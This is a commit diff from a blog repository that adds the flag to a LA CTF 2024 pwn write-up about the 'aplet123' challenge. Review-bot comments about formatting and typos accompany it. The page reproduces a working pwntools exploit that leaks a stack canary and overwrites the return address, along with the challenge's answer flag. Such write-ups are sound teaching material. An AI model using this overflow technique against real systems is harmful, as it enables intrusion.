
Commit

added flag
daniel committed Feb 22, 2024
1 parent 46fbce5 commit bb5d858
Showing 2 changed files with 8 additions and 3 deletions.
4 changes: 4 additions & 0 deletions content/posts/la-ctf-2024-pwn-aplet123.md
Expand Up @@ -137,4 +137,8 @@ target.sendline(payload)
target.sendline('bye')

target.interactive()
```

```
lactf{so_untrue_ei2p1wfwh9np2gg6}
```
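Review bot: the new fenced block holding the flag at the end of the post has no language tag and no introductory sentence, so in the rendered page it reads as more output of the solve script rather than as the result. Consider a short lead line before it (for example `The flag:`) or a fence tag such as ```text so it is visually separated from the pwntools script above it.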
7 changes: 4 additions & 3 deletions public/posts/la-ctf-2024-pwn-aplet123/index.html
Expand Up @@ -100,8 +100,8 @@
"keywords": [

],
"articleBody": "We are given a binary and source code. Taking a look at the source code:\n#include #include #include #include #include void print_flag(void) { char flag[256]; FILE *flag_file = fopen(\"flag.txt\", \"r\"); fgets(flag, sizeof flag, flag_file); puts(flag); } const char *const responses[] = {\"L\", \"amongus\", \"true\", \"pickle\", \"GINKOID\", \"L bozo\", \"wtf\", \"not with that attitude\", \"increble\", \"based\", \"so true\", \"monka\", \"wat\", \"monkaS\", \"banned\", \"holy based\", \"daz crazy\", \"smh\", \"bruh\", \"lol\", \"mfw\", \"skissue\", \"so relatable\", \"copium\", \"untrue!\", \"rolled\", \"cringe\", \"unlucky\", \"lmao\", \"eLLe\", \"loser!\", \"cope\", \"I use arch btw\"}; int main(void) { setbuf(stdout, NULL); srand(time(NULL)); char input[64]; puts(\"hello\"); while (1) { gets(input); char *s = strstr(input, \"i'm\"); if (s) { printf(\"hi %s, i'm aplet123\\n\", s + 4); } else if (strcmp(input, \"please give me the flag\") == 0) { puts(\"i'll consider it\"); sleep(5); puts(\"no\"); } else if (strcmp(input, \"bye\") == 0) { puts(\"bye\"); break; } else { puts(responses[rand() % (sizeof responses / sizeof responses[0])]); } } } checksec --file=aplet123 RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH 49 Symbols No 0 3 aplet123 And taking a look at the binary with checksec we see that we have PIE turned off but we have a stack canary.\ngets(input); char *s = strstr(input, \"i'm\"); if (s) { printf(\"hi %s, i'm aplet123\\n\", s + 4); We see that we are using gets which gives us a buffer overflow. Remeber that strstr retrusns a pointer to the first occuraence of the sequence we are seraching for. 
So if our input contains ‘i’m’ at the end, then we can read past the buffer and this lets us leak the canary.\ntarget.sendline(\"A\" * 69 + \"i'm\") target.recvuntil(\"hi \") canary = target.recv(7) Recall that the least significant bit of the canary is a null byte. I believe this is to prevent the canary from being leaked if for example it is next to a string that is not null terminated in memroy that is being read.\nNow that we have the canary, we need to use the buffer overflow to overwrite the saved return address.\nComplete solve script:\nfrom pwn import * context.log_level = \"DEBUG\" printflag_addr = 0x4011e6 target = remote(\"chall.lac.tf\", 31123) target.recvuntil(\"hello\") target.sendline(\"A\" * 69 + \"i'm\") target.recvuntil(\"hi \") canary = target.recv(7) payload = b\"A\" * 72 payload += b'\\x00' + canary payload += b\"A\" * 8 payload += p64(printflag_addr) target.sendline(payload) target.sendline('bye') target.interactive() ",
"wordCount" : "404",
"articleBody": "We are given a binary and source code. Taking a look at the source code:\n#include #include #include #include #include void print_flag(void) { char flag[256]; FILE *flag_file = fopen(\"flag.txt\", \"r\"); fgets(flag, sizeof flag, flag_file); puts(flag); } const char *const responses[] = {\"L\", \"amongus\", \"true\", \"pickle\", \"GINKOID\", \"L bozo\", \"wtf\", \"not with that attitude\", \"increble\", \"based\", \"so true\", \"monka\", \"wat\", \"monkaS\", \"banned\", \"holy based\", \"daz crazy\", \"smh\", \"bruh\", \"lol\", \"mfw\", \"skissue\", \"so relatable\", \"copium\", \"untrue!\", \"rolled\", \"cringe\", \"unlucky\", \"lmao\", \"eLLe\", \"loser!\", \"cope\", \"I use arch btw\"}; int main(void) { setbuf(stdout, NULL); srand(time(NULL)); char input[64]; puts(\"hello\"); while (1) { gets(input); char *s = strstr(input, \"i'm\"); if (s) { printf(\"hi %s, i'm aplet123\\n\", s + 4); } else if (strcmp(input, \"please give me the flag\") == 0) { puts(\"i'll consider it\"); sleep(5); puts(\"no\"); } else if (strcmp(input, \"bye\") == 0) { puts(\"bye\"); break; } else { puts(responses[rand() % (sizeof responses / sizeof responses[0])]); } } } checksec --file=aplet123 RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH 49 Symbols No 0 3 aplet123 And taking a look at the binary with checksec we see that we have PIE turned off but we have a stack canary.\ngets(input); char *s = strstr(input, \"i'm\"); if (s) { printf(\"hi %s, i'm aplet123\\n\", s + 4); We see that we are using gets which gives us a buffer overflow. Remeber that strstr retrusns a pointer to the first occuraence of the sequence we are seraching for. 
So if our input contains ‘i’m’ at the end, then we can read past the buffer and this lets us leak the canary.\ntarget.sendline(\"A\" * 69 + \"i'm\") target.recvuntil(\"hi \") canary = target.recv(7) Recall that the least significant bit of the canary is a null byte. I believe this is to prevent the canary from being leaked if for example it is next to a string that is not null terminated in memroy that is being read.\nNow that we have the canary, we need to use the buffer overflow to overwrite the saved return address.\nComplete solve script:\nfrom pwn import * context.log_level = \"DEBUG\" printflag_addr = 0x4011e6 target = remote(\"chall.lac.tf\", 31123) target.recvuntil(\"hello\") target.sendline(\"A\" * 69 + \"i'm\") target.recvuntil(\"hi \") canary = target.recv(7) payload = b\"A\" * 72 payload += b'\\x00' + canary payload += b\"A\" * 8 payload += p64(printflag_addr) target.sendline(payload) target.sendline('bye') target.interactive() lactf{so_untrue_ei2p1wfwh9np2gg6} ",
"wordCount" : "405",
"inLanguage": "en",
"datePublished": "2024-02-21T17:20:12-05:00",
"dateModified": "2024-02-21T17:20:12-05:00",
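Review bot: this file is generated site output under public/, and the hunk only changes the articleBody string and wordCount, so it should be regenerated from the markdown rather than hand-edited or hand-reviewed. The typos carried into the body ("Remeber", "retrusns", "occuraence", "seraching", "memroy") and the phrase "least significant bit of the canary is a null byte" (it is the least significant byte that is zero, which is exactly why the script sends `b'\x00' + canary` after receiving only 7 bytes with `target.recv(7)`) should be fixed in content/posts/la-ctf-2024-pwn-aplet123.md, where the source lives, and the HTML re-rendered from it.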
Expand Down Expand Up @@ -288,7 +288,8 @@ <h1 class="post-title entry-hint-parent">
</span></span><span style="display:flex;"><span>target<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">&#39;bye&#39;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>target<span style="color:#f92672">.</span>interactive()
</span></span></code></pre></div>
</span></span></code></pre></div><pre tabindex="0"><code>lactf{so_untrue_ei2p1wfwh9np2gg6}
</code></pre>

</div>
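Review bot: the added `<pre tabindex="0"><code>` for the flag is appended on the same line as the closing `</span></span></code></pre></div>` of the highlighted script and lacks the `<div>` wrapper and span styling the preceding block has, which is what a fence without a language tag produces. Since this file is generated, tag or introduce the fence in the source markdown and regenerate rather than editing the HTML directly.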


0 comments on commit bb5d858
